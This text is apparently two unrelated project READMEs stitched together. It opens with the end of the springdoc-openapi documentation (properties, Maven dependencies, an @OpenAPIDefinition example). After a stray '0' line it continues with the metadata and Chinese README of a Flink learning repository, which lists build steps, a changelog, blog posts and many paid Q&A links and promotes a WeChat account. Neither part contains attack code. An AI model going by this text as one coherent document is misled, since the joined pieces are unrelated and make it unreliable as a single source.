# /api-docs endpoint custom path
springdoc.api-docs.path=/api-docs
```

* This step is optional: if you want to disable `springdoc-openapi` endpoints, add a custom springdoc property in your `spring-boot` configuration file:

```properties
# disable api-docs
springdoc.api-docs.enabled=false
```

## Error Handling for REST using @ControllerAdvice

To generate documentation automatically, make sure all the methods declare the HTTP code responses using the annotation: @ResponseStatus.

## Adding API Information and Security documentation

The library uses spring-boot application auto-configured packages to scan for the following annotations in spring beans: OpenAPIDefinition and Info. These annotations declare API information: title, version, licence, servers, tags, security and externalDocs. For better performance of documentation generation, declare the `@OpenAPIDefinition` and `@SecurityScheme` annotations within a Spring-managed bean (a short sketch follows at the end of this README).

## spring-webflux support with Annotated Controllers

* Documentation can be available in yaml format as well, on the following path: /v3/api-docs.yaml
* Add the library to the list of your project dependencies (no additional configuration is needed):

```xml
   <dependency>
      <groupId>org.springdoc</groupId>
      <artifactId>springdoc-openapi-starter-webflux-ui</artifactId>
      <version>last-release-version</version>
   </dependency>
```

* This step is optional: for a custom path of the swagger documentation in HTML format, add a custom springdoc property in your spring-boot configuration file:

```properties
# swagger-ui custom path
springdoc.swagger-ui.path=/swagger-ui.html
```

The `springdoc-openapi` libraries are hosted on the maven central repository. The artifacts can be accessed at the following locations:

Releases:
* [https://s01.oss.sonatype.org/content/groups/public/org/springdoc/](https://s01.oss.sonatype.org/content/groups/public/org/springdoc/)

Snapshots:
* [https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/](https://s01.oss.sonatype.org/content/repositories/snapshots/org/springdoc/)

# Acknowledgements

## Contributors

springdoc-openapi stays relevant and regularly updated thanks to the valuable contributions from its [contributors](https://github.com/springdoc/springdoc-openapi/graphs/contributors).

<a href="https://github.com/springdoc/springdoc-openapi/graphs/contributors">
<img src="https://contrib.rocks/image?repo=springdoc/springdoc-openapi" width="50%"/>
</a>

Thank you all for your support!

## Additional Support

* [Spring Team](https://spring.io/team) - Thanks for their support by sharing all relevant resources around Spring projects.
* [JetBrains](https://www.jetbrains.com/?from=springdoc-openapi) - Thanks a lot for supporting the springdoc-openapi project.

![JetBrains logo](https://springdoc.org/img/jetbrains.svg)
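As referenced in the "Adding API Information and Security documentation" section above, here is a minimal sketch of declaring API information on a Spring-managed bean; the title, version and licence values are made-up placeholders:

```java
import io.swagger.v3.oas.annotations.OpenAPIDefinition;
import io.swagger.v3.oas.annotations.info.Info;
import io.swagger.v3.oas.annotations.info.License;
import org.springframework.context.annotation.Configuration;

// A Spring-managed bean carrying the @OpenAPIDefinition annotation, as
// recommended for better documentation-generation performance.
@OpenAPIDefinition(info = @Info(
        title = "Inventory API",          // placeholder
        version = "v1",                   // placeholder
        license = @License(
                name = "Apache 2.0",
                url = "https://www.apache.org/licenses/LICENSE-2.0")))
@Configuration
public class OpenApiConfig {
}
```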
0
zhisheng17/flink-learning
flink learning blog. http://www.54tianzhisheng.cn/ Covers Flink fundamentals, concepts, internals, hands-on practice, performance tuning, source-code analysis and more. Includes learning examples for Flink Connectors, Metrics, Libraries, the DataStream API, and the Table API & SQL, plus shared case studies of large production Flink projects (PV/UV, log storage, real-time deduplication over tens of billions of records, monitoring and alerting). Please support my column, "Big Data Real-Time Compute Engine Flink: Practice and Performance Optimization".
clickhouse elasticsearch flink hbase influxdb kafka loki mysql opentsdb rabbitmq redis rocketmq spark stream-processing streaming
# Flink Learning

If you are passing by, please give this project a star. It has not been easy to write this much, and a star is real encouragement to keep going! Special thanks also to [JetBrains](https://jb.gg/OpenSourceSupport) for providing their free all-products pack, 🙏🙏🙏!

![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-05-25-124027.jpg)

## Stargazers over time

![Stargazers over time](https://starchart.cc/zhisheng17/flink-learning.svg)

## Project structure

![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/2020-01-11-064410.png)

## How to build

If needed, add the Aliyun central mirror to the mirrors section of your Maven `settings.xml`:

```xml
<mirror>
    <id>alimaven</id>
    <mirrorOf>central</mirrorOf>
    <name>aliyun maven</name>
    <url>https://maven.aliyun.com/repository/central</url>
</mirror>
```

Then run the following command:

```
mvn clean package -Dmaven.test.skip=true
```

You should see the following output if the build succeeds.

![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-27-121923.jpg)

## Flink column

A paid column based on Flink 1.9, covering getting started, concepts, internals, hands-on practice, performance tuning and system case studies. Scan the QR code below to subscribe.

![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-11-05-044731.jpg)

First published at: [http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/](http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/)

Column home: [https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f](https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f)

## Change

**2022/02/26** Published my column "Flink in Action and Performance Tuning" on GitHub; see the books directory.

**2021/12/18** Upgraded the project's Flink version to 1.14.2; check the old branches if you need earlier code.

**2021/08/15** Upgraded the project's Flink version to 1.13.2. The APIs changed significantly, so the code structure was adjusted accordingly (some code was removed from the master branch, and the previous code was moved to [feature/flink-1.10.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.10.0); check the old branch if you need it).

**2020/02/16** Upgraded the project's Flink version to 1.10. All code on this version has been tested and runs successfully, so prefer it as a reference. If the code fails on your cluster, check whether your Flink version matches and whether there are dependency conflicts.

**2019/09/06** Upgraded the project's Flink version to 1.9.0, with some changes. After discussion in the group, the Flink 1.8.0 code is kept on the branch [feature/flink-1.8.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.8.0) for those who need it.

**2019/06/08** Four Flink books:

+ [Introduction_to_Apache_Flink_book.pdf]() - a thin, introductory book; a Chinese translation is available
+ [Learning Apache Flink.pdf]() - fairly basic, worth reading when starting out
+ [Stream Processing with Apache Flink.pdf]() - written by Flink PMC members
+ [Streaming System.pdf]() - an exceptionally well-regarded book

**2019/06/09** Added papers on stream processing engines, under the paper directory:

+ [Papers on stream processing engines](./paper/paper.md)

**Note:** the book downloads were removed for copyright reasons; switch to an old branch if you need them.

## Blog

1. [Learning Flink from 0 to 1: An Introduction to Apache Flink](http://www.54tianzhisheng.cn/2018/10/13/flink-introduction/)

2. [Learning Flink from 0 to 1: Setting up Flink 1.6.0 on a Mac and running a simple starter program](http://www.54tianzhisheng.cn/2018/09/18/flink-install)

3. [Learning Flink from 0 to 1: Flink configuration files explained](http://www.54tianzhisheng.cn/2018/10/27/flink-config/)

4. [Learning Flink from 0 to 1: An introduction to Data Sources](http://www.54tianzhisheng.cn/2018/10/28/flink-sources/)

5. [Learning Flink from 0 to 1: How to write a custom Data Source?](http://www.54tianzhisheng.cn/2018/10/30/flink-create-source/)

6. [Learning Flink from 0 to 1: An introduction to Data Sinks](http://www.54tianzhisheng.cn/2018/10/29/flink-sink/)

7. [Learning Flink from 0 to 1: How to write a custom Data Sink?](http://www.54tianzhisheng.cn/2018/10/31/flink-create-sink/)

8. [Learning Flink from 0 to 1: Flink Data transformations](http://www.54tianzhisheng.cn/2018/11/04/Flink-Data-transformation/)

9. [Learning Flink from 0 to 1: An introduction to Stream Windows in Flink](http://www.54tianzhisheng.cn/2018/12/08/Flink-Stream-Windows/)

10. [Learning Flink from 0 to 1: The notions of Time in Flink explained](http://www.54tianzhisheng.cn/2018/12/11/Flink-time/)

11. [Learning Flink from 0 to 1: Reading data from Kafka and writing it to ElasticSearch](http://www.54tianzhisheng.cn/2018/12/30/Flink-ElasticSearch-Sink/)

12. [Learning Flink from 0 to 1: How does a Flink project run?](http://www.54tianzhisheng.cn/2019/01/05/Flink-run/)

13. [Learning Flink from 0 to 1: Reading data from Kafka and writing it to 
Kafka](http://www.54tianzhisheng.cn/2019/01/06/Flink-Kafka-sink/) 14、[Flink 从0到1学习 —— Flink JobManager 高可用性配置](http://www.54tianzhisheng.cn/2019/01/13/Flink-JobManager-High-availability/) 15、[Flink 从0到1学习 —— Flink parallelism 和 Slot 介绍](http://www.54tianzhisheng.cn/2019/01/14/Flink-parallelism-slot/) 16、[Flink 从0到1学习 —— Flink 读取 Kafka 数据批量写入到 MySQL](http://www.54tianzhisheng.cn/2019/01/15/Flink-MySQL-sink/) 17、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RabbitMQ](https://t.zsxq.com/uVbi2nq) 18、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HBase](https://t.zsxq.com/zV7MnuJ) 19、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HDFS](https://t.zsxq.com/zV7MnuJ) 20、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Redis](https://t.zsxq.com/zV7MnuJ) 21、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Cassandra](https://t.zsxq.com/uVbi2nq) 22、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Flume](https://t.zsxq.com/zV7MnuJ) 23、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 InfluxDB](https://t.zsxq.com/zV7MnuJ) 24、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RocketMQ](https://t.zsxq.com/zV7MnuJ) 25、[Flink 从0到1学习 —— 你上传的 jar 包藏到哪里去了](https://t.zsxq.com/uniY7mm) 26、[Flink 从0到1学习 —— 你的 Flink job 日志跑到哪里去了](https://t.zsxq.com/zV7MnuJ) ### Flink 源码项目结构 ![](./pics/Flink-code.png) ## 学习资料 另外我自己整理了些 Flink 的学习资料,目前已经全部放到微信公众号了。 你可以加我的微信:**yuanblog_tzs**,然后回复关键字:**Flink** 即可无条件获取到,转载请联系本人获取授权,违者必究。 ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-17-143454.jpg) 更多私密资料请加入知识星球! ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-23-124320.jpg) 有人要问知识星球里面更新什么内容?值得加入吗? 目前知识星球内已更新的系列文章: ### 大数据重磅炸弹 1、[《大数据重磅炸弹——实时计算引擎 Flink》开篇词](https://t.zsxq.com/fqfuVRR​) 2、[你公司到底需不需要引入实时计算引擎?](https://t.zsxq.com/emMBaQN​) 3、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2) ​ 4、[别再傻傻的分不清大数据框架Flink、Blink、Spark Streaming、Structured Streaming和Storm之间的区别了](https://t.zsxq.com/eAyRz7Y)​ 5、[Flink 环境准备看这一篇就够了](https://t.zsxq.com/iaMJAe6​)   6、[一文讲解从 Flink 环境安装到源码编译运行](https://t.zsxq.com/iaMJAe6​) 7、[通过 WordCount 程序教你快速入门上手 Flink](https://t.zsxq.com/eaIIiAm)  ​ 8、[Flink 如何处理 Socket 数据及分析实现过程](https://t.zsxq.com/Vnq72jY​)   9、[Flink job 如何在 Standalone、YARN、Mesos、K8S 上部署运行?](https://t.zsxq.com/BiyvFUZ​) 10、[Flink 数据转换必须熟悉的算子(Operator)](https://t.zsxq.com/fufUBiA) 11、[Flink 中 Processing Time、Event Time、Ingestion Time 对比及其使用场景分析](https://t.zsxq.com/r7aYB2V) 12、[如何使用 Flink Window 及 Window 基本概念与实现原理](https://t.zsxq.com/byZbyrb) 13、[如何使用 DataStream API 来处理数据?](https://t.zsxq.com/VzNBi2r) 14、[Flink WaterMark 详解及结合 WaterMark 处理延迟数据](https://t.zsxq.com/Iub6IQf) 15、[基于 Apache Flink 的监控告警系统](https://t.zsxq.com/MniUnqb) 16、[数据仓库、数据库的对比介绍与实时数仓案例分享](https://t.zsxq.com/v7QzNZ3) 17、[使用 Prometheus Grafana 监控 Flink](https://t.zsxq.com/uRN3VfA) ### 源码系列 1、[Flink 源码解析 —— 源码编译运行](https://t.zsxq.com/UZfaYfE) 2、[Flink 源码解析 —— 项目结构一览](https://t.zsxq.com/zZZjaYf) 3、[Flink 源码解析—— local 模式启动流程](https://t.zsxq.com/zV7MnuJ) 4、[Flink 源码解析 —— standalonesession 模式启动流程](https://t.zsxq.com/QZVRZJA) 5、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Job Manager 启动](https://t.zsxq.com/u3fayvf) 6、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Task Manager 启动](https://t.zsxq.com/MnQRByb) 7、[Flink 源码解析 —— 分析 Batch WordCount 程序的执行过程](https://t.zsxq.com/YJ2Zrfi) 8、[Flink 源码解析 —— 分析 Streaming WordCount 程序的执行过程](https://t.zsxq.com/qnMFEUJ) 9、[Flink 源码解析 —— 如何获取 JobGraph?](https://t.zsxq.com/naaMf6y) 10、[Flink 源码解析 —— 如何获取 StreamGraph?](https://t.zsxq.com/qRFIm6I) 11、[Flink 源码解析 —— Flink JobManager 有什么作用?](https://t.zsxq.com/2VRrbuf) 12、[Flink 源码解析 —— Flink TaskManager 有什么作用?](https://t.zsxq.com/RZbu7yN) 
13、[Flink 源码解析 —— JobManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ) 14、[Flink 源码解析 —— TaskManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ) 15、[Flink 源码解析 —— 深度解析 Flink Checkpoint 机制](https://t.zsxq.com/ynQNbeM) 16、[Flink 源码解析 —— 深度解析 Flink 序列化机制](https://t.zsxq.com/JaQfeMf) 17、[Flink 源码解析 —— 深度解析 Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM) 18、[Flink Metrics 源码解析 —— Flink-metrics-core](https://t.zsxq.com/Mnm2nI6) 19、[Flink Metrics 源码解析 —— Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6) 20、[Flink Metrics 源码解析 —— Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6) 21、[Flink Metrics 源码解析 —— Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6) 22、[Flink Metrics 源码解析 —— Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6) 23、[Flink Metrics 源码解析 —— Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6) 24、[Flink Metrics 源码解析 —— Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6) 25、[Flink Metrics 源码解析 —— Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6) 26、[Flink Metrics 源码解析 —— Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6) ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-150037.jpg) 26、[Flink Annotations 源码解析](https://t.zsxq.com/f6eAu3J) ![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-145923.jpg) 除了《从1到100深入学习Flink》源码学习这个系列文章,《从0到1学习Flink》的案例文章也会优先在知识星球更新,让大家先通过一些 demo 学习 Flink,再去深入源码学习! 如果学习 Flink 的过程中,遇到什么问题,可以在里面提问,我会优先解答,这里做个抱歉,自己平时工作也挺忙,微信的问题不能做全部做一些解答, 但肯定会优先回复给知识星球的付费用户的,庆幸的是现在星球里的活跃氛围还是可以的,有不少问题通过提问和解答的方式沉淀了下来。 1、[为何我使用 ValueState 保存状态 Job 恢复是状态没恢复?](https://t.zsxq.com/62rZV7q) 2、[flink中watermark究竟是如何生成的,生成的规则是什么,怎么用来处理乱序数据](https://t.zsxq.com/yF2rjmY) 3、[消费kafka数据的时候,如果遇到了脏数据,或者是不符合规则的数据等等怎么处理呢?](https://t.zsxq.com/uzFIeiq) 4、[在Kafka 集群中怎么指定读取/写入数据到指定broker或从指定broker的offset开始消费?](https://t.zsxq.com/Nz7QZBY) 5、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj) 6、[jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7) 7、[使用flink-web-ui提交作业并执行 但是/opt/flink/log目录下没有日志文件 请问关于flink的日志(包括jobmanager、taskmanager、每个job自己的日志默认分别存在哪个目录 )需要怎么配置?](https://t.zsxq.com/Nju7EuV) 8、[通过flink 仪表盘提交的jar 是存储在哪个目录下?](https://t.zsxq.com/6muRz3j) 9、[从Kafka消费数据进行etl清洗,把结果写入hdfs映射成hive表,压缩格式、hive直接能够读取flink写出的文件、按照文件大小或者时间滚动生成文件](https://t.zsxq.com/uvFQvFu) 10、[flink jar包上传至集群上运行,挂掉后,挂掉期间kafka中未被消费的数据,在重新启动程序后,是自动从checkpoint获取挂掉之前的kafka offset位置,自动消费之前的数据进行处理,还是需要某些手动的操作呢?](https://t.zsxq.com/ubIY33f) 11、[flink 启动时不自动创建 上传jar的路径,能指定一个创建好的目录吗](https://t.zsxq.com/UfA2rBy) 12、[Flink sink to es 集群上报 slot 不够,单机跑是好的,为什么?](https://t.zsxq.com/zBMnIA6) 13、[Fllink to elasticsearch如何创建索引文档期时间戳?](https://t.zsxq.com/qrZBAQJ) 14、[blink有没有api文档或者demo,是否建议blink用于生产环境。](https://t.zsxq.com/J2JiIMv) 15、[flink的Python api怎样?bug多吗?](https://t.zsxq.com/ZVVrjuv) 16、[Flink VS Spark Streaming VS Storm VS Kafka Stream ](https://t.zsxq.com/zbybQNf) 17、[你们做实时大屏的技术架构是什么样子的?flume→kafka→flink→redis,然后后端去redis里面捞数据,酱紫可行吗?](https://t.zsxq.com/Zf6meAm) 18、[做一个统计指标的时候,需要在Flink的计算过程中多次读写redis,感觉好怪,星主有没有好的方案?](https://t.zsxq.com/YniI2JQ) 19、[Flink 使用场景大分析,列举了很多的常用场景,可以好好参考一下](https://t.zsxq.com/fYZZfYf) 20、[将kafka中数据sink到mysql时,metadata的数据为空,导入mysql数据不成功???](https://t.zsxq.com/I6eEqR7) 21、[使用了ValueState来保存中间状态,在运行时中间状态保存正常,但是在手动停止后,再重新运行,发现中间状态值没有了,之前出现的键值是从0开始计数的,这是为什么?是需要实现CheckpointedFunction吗?](https://t.zsxq.com/62rZV7q) 22、[flink on yarn jobmanager的HA需要怎么配置。还是说yarn给管理了](https://t.zsxq.com/mQ7YbQJ) 23、[有两个数据流就行connect,其中一个是实时数据流(kafka 读取),另一个是配置流。由于配置流是从关系型数据库中读取,速度较慢,导致实时数据流流入数据的时候,配置信息还未发送,这样会导致有些实时数据读取不到配置信息。目前采取的措施是在connect方法后的flatmap的实现的在open 
方法中,提前加载一次配置信息,感觉这种实现方式不友好,请问还有其他的实现方式吗?](https://t.zsxq.com/q3VvB6U) 24、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj) 25、[不采用yarm部署flink,还有其他的方案吗? 主要想解决服务器重启后,flink服务怎么自动拉起? jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7) 26、[在一个 Job 里将同份数据昨晚清洗操作后,sink 到后端多个地方(看业务需求),如何保持一致性?(一个sink出错,另外的也保证不能插入)](https://t.zsxq.com/bYnimQv) 27、[flink sql任务在某个特定阶段会发生tm和jm丢失心跳,是不是由于gc时间过长呢,](https://t.zsxq.com/YvBAyrV) 28、[有这样一个需求,统计用户近两周进入产品详情页的来源(1首页大搜索,2产品频道搜索,3其他),为php后端提供数据支持,该信息在端上报事件中,php直接获取有点困难。 我现在的解决方案 通过flink滚动窗口(半小时),统计用户半小时内3个来源pv,然后按照日期序列化,直接写mysql。php从数据库中解析出来,再去统计近两周占比。 问题1,这个需求适合用flink去做吗? 问题2,我的方案总感觉怪怪的,有没有好的方案?](https://t.zsxq.com/fayf2Vv) 29、[一个task slot 只能同时运行一个任务还是多个任务呢?如果task slot运行的任务比较大,会出现OOM的情况吗?](https://t.zsxq.com/ZFiY3VZ) 30、[你们怎么对线上flink做监控的,如果整个程序失败了怎么自动重启等等](https://t.zsxq.com/Yn2JqB6) 31、[flink cep规则动态解析有接触吗?有没有成型的框架?](https://t.zsxq.com/YFMFeaA) 32、[每一个Window都有一个watermark吗?window是怎么根据watermark进行触发或者销毁的?](https://t.zsxq.com/VZvRrjm) 33、[ CheckPoint与SavePoint的区别是什么?](https://t.zsxq.com/R3ZZJUF) 34、[flink可以在算子中共享状态吗?或者大佬你有什么方法可以共享状态的呢?](https://t.zsxq.com/Aa62Bim) 35、[运行几分钟就报了,看taskmager日志,报的是 failed elasticsearch bulk request null,可是我代码里面已经做过空值判断了呀 而且也过滤掉了,flink版本1.7.2 es版本6.3.1](https://t.zsxq.com/ayFmmMF) 36、[这种情况,我们调并行度 还是配置参数好](https://t.zsxq.com/Yzzzb2b) 37、[大家都用jdbc写,各种数据库增删查改拼sql有没有觉得很累,ps.set代码一大堆,还要计算每个参数的位置](https://t.zsxq.com/AqBUR3f) 38、[关于datasource的配置,每个taskmanager对应一个datasource?还是每个slot? 实际运行下来,每个slot中datasorce线程池只要设置1就行了,多了也用不到?](https://t.zsxq.com/AqBUR3f) 39、[kafka现在每天出现数据丢失,现在小批量数据,一天200W左右, kafka版本为 1.0.0,集群总共7个节点,TOPIC有十六个分区,单条报文1.5k左右](https://t.zsxq.com/AqBUR3f) 40、[根据key.hash的绝对值 对并发度求模,进行分组,假设10各并发度,实际只有8个分区有处理数据,有2个始终不处理,还有一个分区处理的数据是其他的三倍,如截图](https://t.zsxq.com/AqBUR3f) 41、[flink每7小时不知道在处理什么, CPU 负载 每7小时,有一次高峰,5分钟内平均负载超过0.8,如截图](https://t.zsxq.com/AqBUR3f) 42、[有没有Flink写的项目推荐?我想看到用Flink写的整体项目是怎么组织的,不单单是一个单例子](https://t.zsxq.com/M3fIMbu) 43、[Flink 源码的结构图](https://t.zsxq.com/yv7EQFA) 44、[我想根据不同业务表(case when)进行不同的redis sink(hash ,set),我要如何操作?](https://t.zsxq.com/vBAYNJq) 45、[这个需要清理什么数据呀,我把hdfs里面的已经清理了 启动还是报这个](https://t.zsxq.com/b2zbUJa) 46、[ 在流处理系统,在机器发生故障恢复之后,什么情况消息最多会被处理一次?什么情况消息最少会被处理一次呢?](https://t.zsxq.com/QjQFmQr) 47、[我检查点都调到5分钟了,这是什么问题](https://t.zsxq.com/zbQNfuJ) 48、[reduce方法后 那个交易时间 怎么不是最新的,是第一次进入的那个时间,](https://t.zsxq.com/ZrjEauN) 49、[Flink on Yarn 模式,用yarn session脚本启动的时候,我在后台没有看到到Jobmanager,TaskManager,ApplicationMaster这几个进程,想请问一下这是什么原因呢?因为之前看官网的时候,说Jobmanager就是一个jvm进程,Taskmanage也是一个JVM进程](https://t.zsxq.com/VJyr3bM) 50、[Flink on Yarn的时候得指定 多少个TaskManager和每个TaskManager slot去运行任务,这样做感觉不太合理,因为用户也不知道需要多少个TaskManager适合,Flink 有动态启动TaskManager的机制吗。](https://t.zsxq.com/VJyr3bM) 51、[参考这个例子,Flink 零基础实战教程:如何计算实时热门商品 | Jark's Blog, 窗口聚合的时候,用keywindow,用的是timeWindowAll,然后在aggregate的时候用aggregate(new CustomAggregateFunction(), new CustomWindowFunction()),打印结果后,发现窗口中一直使用的重复的数据,统计的结果也不变,去掉CustomWindowFunction()就正常了 ? 非常奇怪](https://t.zsxq.com/UBmUJMv) 52、[用户进入产品预定页面(端埋点上报),并填写了一些信息(端埋点上报),但半小时内并没有产生任何订单,然后给该类用户发送一个push。 1. 这种需求适合用flink去做吗?2. 
如果适合,说下大概的思路](https://t.zsxq.com/naQb6aI) 53、[业务场景是实时获取数据存redis,请问我要如何按天、按周、按月分别存入redis里?(比方说过了一天自动换一个位置存redis)](https://t.zsxq.com/AUf2VNz) 54、[有人 AggregatingState 的例子吗, 感觉官方的例子和 官网的不太一样?](https://t.zsxq.com/UJ6Y7m2) 55、[flink-jdbc这个jar有吗?怎么没找到啊?1.8.0的没找到,1.6.2的有](https://t.zsxq.com/r3BaAY3) 56、[现有个关于savepoint的问题,操作流程为,取消任务时设置保存点,更新任务,从保存点启动任务;现在遇到个问题,假设我中间某个算子重写,原先通过state编写,有用定时器,现在更改后,采用窗口,反正就是实现方式完全不一样;从保存点启动就会一直报错,重启,原先的保存点不能还原,此时就会有很多数据重复等各种问题,如何才能保证数据不丢失,不重复等,恢复到停止的时候,现在想到的是记下kafka的偏移量,再做处理,貌似也不是很好弄,有什么解决办法吗](https://t.zsxq.com/jiybIee) 57、[需要在flink计算app页面访问时长,消费Kafka计算后输出到Kafka。第一条log需要等待第二条log的时间戳计算访问时长。我想问的是,flink是分布式的,那么它能否保证执行的顺序性?后来的数据有没有可能先被执行?](https://t.zsxq.com/eMJmiQz) 58、[我公司想做实时大屏,现有技术是将业务所需指标实时用spark拉到redis里存着,然后再用一条spark streaming流计算简单乘除运算,指标包含了各月份的比较。请问我该如何用flink简化上述流程?](https://t.zsxq.com/Y7e6aIu) 59、[flink on yarn 方式,这样理解不知道对不对,yarn-session这个脚本其实就是准备yarn环境的,执行run任务的时候,根据yarn-session初始化的yarnDescription 把 flink 任务的jobGraph提交到yarn上去执行](https://t.zsxq.com/QbIayJ6) 60、[同样的代码逻辑写在单独的main函数中就可以成功的消费kafka ,写在一个spring boot的程序中,接受外部请求,然后执行相同的逻辑就不能消费kafka。你遇到过吗?能给一些查问题的建议,或者在哪里打个断点,能看到为什么消费不到kafka的消息呢?](https://t.zsxq.com/VFMRbYN) 61、[请问下flink可以实现一个流中同时存在订单表和订单商品表的数据 两者是一对多的关系 能实现得到 以订单表为主 一个订单多个商品 这种需求嘛](https://t.zsxq.com/QNvjI6Q) 62、[在用中间状态的时候,如果中间一些信息保存在state中,有没有必要在redis中再保存一份,来做第三方的存储。](https://t.zsxq.com/6ie66EE) 63、[能否出一期flink state的文章。什么场景下用什么样的state?如,最简单的,实时累加update到state。](https://t.zsxq.com/bm6mYjI) 64、[flink的双流join博主有使用的经验吗?会有什么常见的问题吗](https://t.zsxq.com/II6AEe2) 65、[窗口触发的条件问题](https://t.zsxq.com/V7EmUZR) 66、[flink 定时任务怎么做?有相关的demo么?](https://t.zsxq.com/JY3NJam) 67、[流式处理过程中数据的一致性如何保证或者如何检测](https://t.zsxq.com/7YZ3Fuz) 68、[重启flink单机集群,还报job not found 异常。](https://t.zsxq.com/nEEQvzR) 69、[kafka的数据是用 org.apache.kafka.common.serialization.ByteArraySerialize序列化的,flink这边消费的时候怎么通过FlinkKafkaConsumer创建DataStream<String>?](https://t.zsxq.com/qJyvzNj) 70、[现在公司有一个需求,一些用户的支付日志,通过sls收集,要把这些日志处理后,结果写入到MySQL,关键这些日志可能连着来好几条才是一个用户的,因为发起请求,响应等每个环节都有相应的日志,这几条日志综合处理才能得到最终的结果,请问博主有什么好的方法没有?](https://t.zsxq.com/byvnaEi) 71、[flink 支持hadoop 主备么? hadoop主节点挂了 flink 会切换到hadoop 备用节点?](https://t.zsxq.com/qfie6qR) 72、[请教大家: 实际 flink 开发中用 scala 多还是 java多些? 
刚入手 flink 大数据 scala 需要深入学习么?](https://t.zsxq.com/ZVZzZv7) 73、[我使用的是flink是1.7.2最近用了split的方式分流,但是底层的SplitStream上却标注为Deprecated,请问是官方不推荐使用分流的方式吗?](https://t.zsxq.com/Qzbi6yn) 74、[KeyBy 的正确理解,和数据倾斜问题的解释](https://t.zsxq.com/Auf2NVR) 75、[用flink时,遇到个问题 checkpoint大概有2G左右, 有背压时,flink会重启有遇到过这个问题吗](https://t.zsxq.com/3vnIm62) 76、[flink使用yarn-session方式部署,如何保证yarn-session的稳定性,如果yarn-session挂了,需要重新部署一个yarn-session,如何恢复之前yarn-session上的job呢,之前的checkpoint还能使用吗?](https://t.zsxq.com/URzVBIm) 77、[我想请教一下关于sink的问题。我现在的需求是从Kafka消费Json数据,这个Json数据字段可能会增加,然后将拿到的json数据以parquet的格式存入hdfs。现在我可以拿到json数据的schema,但是在保存parquet文件的时候不知道怎么处理。一是flink没有专门的format parquet,二是对于可变字段的Json怎么处理成parquet比较合适?](https://t.zsxq.com/MjyN7Uf) 78、[flink如何在较大的数据量中做去重计算。](https://t.zsxq.com/6qBqVvZ) 79、[flink能在没有数据的时候也定时执行算子吗?](https://t.zsxq.com/Eqjyju7) 80、[使用rocksdb状态后端,自定义pojo怎么实现序列化和反序列化的,有相关demo么?](https://t.zsxq.com/i2zVfIi) 81、[check point 老是失败,是不是自定义的pojo问题?到本地可以,到hdfs就不行,网上也有很多类似的问题 都没有一个很好的解释和解决方案](https://t.zsxq.com/vRJujAi) 82、[cep规则如图,当start事件进入时,时间00:00:15,而后进入end事件,时间00:00:40。我发现规则无法命中。请问within 是从start事件开始计时?还是跟window一样根据系统时间划分的?如果是后者,请问怎么配置才能从start开始计时?](https://t.zsxq.com/MVFmuB6) 83、[Flink聚合结果直接写Mysql的幂等性设计问题](https://t.zsxq.com/EybM3vR) 84、[Flink job打开了checkpoint,用的rocksdb,通过观察hdfs上checkpoint目录,为啥算副本总量会暴增爆减](https://t.zsxq.com/62VzNRF) 85、[Flink 提交任务的 jar包可以指定路径为 HDFS 上的吗]() 86、[在flink web Ui上提交的任务,设置的并行度为2,flink是stand alone部署的。两个任务都正常的运行了几天了,今天有个地方逻辑需要修改,于是将任务cancel掉(在命令行cancel也试了),结果taskmanger挂掉了一个节点。后来用其他任务试了,也同样会导致节点挂掉](https://t.zsxq.com/VfimieI) 87、[一个配置动态更新的问题折腾好久(配置用个静态的map变量存着,有个线程定时去数据库捞数据然后存在这个map里面更新一把),本地 idea 调试没问题,集群部署就一直报 空指针异常。下游的算子使用这个静态变量map去get key在集群模式下会出现这个空指针异常,估计就是拿不到 map](https://t.zsxq.com/nee6qRv) 88、[批量写入MySQL,完成HBase批量写入](https://t.zsxq.com/3bEUZfQ) 89、[用flink清洗数据,其中要访问redis,根据redis的结果来决定是否把数据传递到下流,这有可能实现吗?](https://t.zsxq.com/Zb6AM3V) 90、[监控页面流处理的时候这个发送和接收字节为0。](https://t.zsxq.com/RbeYZvb) 